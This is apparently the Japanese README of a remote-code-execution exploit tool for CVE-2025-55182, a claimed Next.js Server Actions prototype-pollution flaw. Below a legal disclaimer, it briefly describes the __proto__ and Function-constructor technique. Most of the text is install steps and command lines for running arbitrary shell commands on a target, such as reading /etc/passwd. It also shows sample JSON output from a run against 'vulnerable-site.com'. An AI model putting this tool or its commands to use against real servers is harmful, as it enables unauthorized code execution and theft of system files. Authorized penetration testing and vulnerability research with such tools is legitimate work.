
CVE-2025-55182 Next.js RCEエクスプロイトツール
[!CAUTION]
⚠️ 免責事項 - 使用前にお読みください
このツールは以下の目的にのみ使用を意図しています:
- 脆弱性検証を行うセキュリティ研究者
- 明示的な許可を得た正規の侵入テスト
- 教育および学習目的
コンピュータシステムへの不正アクセスは違法です。
このツールを使用することで、以下に同意したものとみなされます:
- システムのテスト前に適切な許可を得ていること
- このツールを悪意のある目的で使用しないこと
- 自身の行動とその結果に対して単独で責任を負うこと
作者はこのツールの誤用に対して一切の責任を負いません。
Next.js のサーバーサイドプロトタイプ汚染(prototype pollution)脆弱性に対するリモートコード実行(RCE)エクスプロイトツールです。
CVE-2025-55182 は Next.js に影響を及ぼす重大なセキュリティ脆弱性で、攻撃者がプロトタイプ汚染を悪用した巧妙なリクエストを通じてリモートコード実行を達成できるようにするものです。
📖 詳細な技術分析については、EXPLOIT.md を参照してください
この脆弱性は、Next.js Server Actions のリクエスト処理メカニズムを悪用し、__proto__ プロトタイプチェーン汚染と Function コンストラクタを組み合わせることで任意のコード実行を達成します。
# yarn を使用する場合
yarn install
# npm を使用する場合
npm install
# 基本的な使い方
node index.js <target_url> [command]
# 例
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# ツールを実行
yarn start http://localhost:3000 "whoami"
# またはエイリアスを使用
yarn exploit http://localhost:3000 "ls -la"
# ヘルプを表示
yarn help
# グローバルにリンク
yarn link
# または
npm link
# その後、コマンドを直接使用
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# リンクを解除
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
このツールは結果を JSON 形式で出力します。
{
"success": true,
"message": "",
"data": "コマンド実行結果"
}
{
"success": false,
"message": "エラーメッセージ",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}